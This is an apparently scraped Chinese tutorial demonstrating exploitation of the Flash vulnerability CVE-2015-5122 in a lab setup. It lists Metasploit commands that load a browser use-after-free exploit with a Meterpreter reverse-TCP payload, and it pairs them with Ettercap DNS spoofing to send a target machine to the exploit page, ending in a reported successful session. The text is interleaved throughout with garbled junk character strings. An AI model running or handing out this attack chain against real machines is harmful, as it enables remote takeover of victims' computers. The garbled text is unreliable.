cve2015-5122漏洞实例演示虚拟机

admin

9 f+ z$ Y' K0 w, s5 k* D, I5 o+ z 二、cve2015-5122漏洞实例演示虚拟机

3 Y- {; @3 g, b& ?% ~% ^' O

  关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图：

' c* b) h$ {. r

3 g; [& c+ m8 @) ^7 W4 @ search cve-2015-5122如图： 2 A! w, J4 ^* I6 d4 Q3 }2 y. z

5 j% z" v, P/ p) m   % r) T0 i. O8 ~

! W) c! v1 y6 J; e- E- U$ V 下面我们敲如下命令： 6 K h+ H3 e: F ~

$ F f' ^. |, m$ y' ^- ^) V6 Z use exploit/multi/browser/adobe_flash_opaque_background_uaf ! E: F2 g: x8 H7 r4 h

1 N8 ]2 O( v9 X

* I! Y2 a/ a- m6 c+ V" l set PAYLOAD windows/meterpreter/reverse_tcp

9 H* |- O. C5 I

: f8 I5 u2 q$ {2 Q; } set LHOST 192.168.0.109 6 V- H$ [& ^5 L& |: D( R

# v0 }7 a/ H# o% _4 _ J* b set URIPATH /                        /*根目录*/ & _* B: w9 X, D: K: a) Y

set SRVHOST 192.168.0.109  //192.168.0.109为kaili ip地址 ! t# c' ?. r2 ~, o

' _- L" Z; T7 R# B1 [

% e4 b7 g+ Y4 B set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用

/ @: l- n n% v$ S4 U

$ s' {5 C: Y* ]; M: k& T7 D4 w 然后show options如图：

  $ t1 G- x- O. z6 D0 T% K0 V- h

5 Y4 k: i1 ]7 {$ D. v

一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
! C3 k/ f* q, H! C4 [" Q: }! D9 Q" r% g

; i4 u3 C7 [4 i9 M( g1 b 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115

) P7 C" i% s1 l: s! q

Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf f7 o2 I& t/ D

  - B1 a3 s0 b) n9 Q( d0 {) X* v

成功了，这时候我们断开ettercap，如图： 1 u' r7 C* T1 ` ]5 t2 b, }+ W

1 v8 \, z0 `, m- ~1 I

$ p% X3 o( J* |% ^$ l   $ [9 e' M, J7 a2 {2 y: w4 A

; p( z ?% C/ l! x% E1 |1 ^

) |- z3 g/ j6 U8 j Screenshot如图： 2 O" `/ A: B* q% r& r7 F

E- A! I5 N2 O( p# V) @8 E6 P3 {